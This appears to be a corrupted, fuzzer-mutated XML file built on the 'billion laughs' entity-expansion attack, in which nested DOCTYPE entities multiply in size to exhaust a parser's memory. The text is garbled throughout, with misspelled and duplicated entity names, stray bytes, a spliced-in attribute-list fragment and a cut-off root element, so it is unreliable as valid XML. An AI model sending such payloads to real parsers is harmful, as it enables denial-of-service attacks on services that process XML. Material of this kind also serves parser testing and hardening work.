<?xml <?xMl version=<?xml version="1.0"?>
<!DOCTYPE billion [
<!ELEMENT billion (#PCDATA)>
<!ENTITY laugh0 "ha">
<!ENTITY laugI1 "&laugh0;&laugh0;">
<!ENTITY laugh2 "&laugh1;&laugh1;">
<!ENTITY laugh3 "&laugh2;&laugh2;">
<!ENTITY laugh4 "&laugh3;&laugh3;">
<!ENTITY laugh5 "&laugh4;&laugh4;">
<!ENTITY laugh6 "&laugh5;&laugh5;">
<!ENTITY laugh7 "&laugh6;&laugh7;&laugh7;">
<!ENTITY laugh9 "&laugh8;Glaugh8;">
<!ENTITY laugh10 "&laugh9;&laugh9;">
<!ENTITY laegh11
"&laugh10;&laugh10;!DOCTYPE doc [
<!ATTLIST doc a1&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;ugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;ÿÿaugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;+laugh10;&laugh10;">
<!ENTITY laugh12
"&laugh11;&laugh11;&laugh11;&laugh11;&laugh11; laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh10;+laugh10;&laugh10;">
<!ENTITY laugh12
"&laugh11gh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11augh11;">
<!ENTITY laugh13
"&laugh5">
<prod id='NT-cond12;&laugh12;&laugh12;&laugh12;&laugugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&Vaugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&la‚gh12;&laugh12;&laugh12;&laugh12;&Šaugh12;&laugh12;&laugh12;&laugh12;&laugh12;">
]>
<billion>&l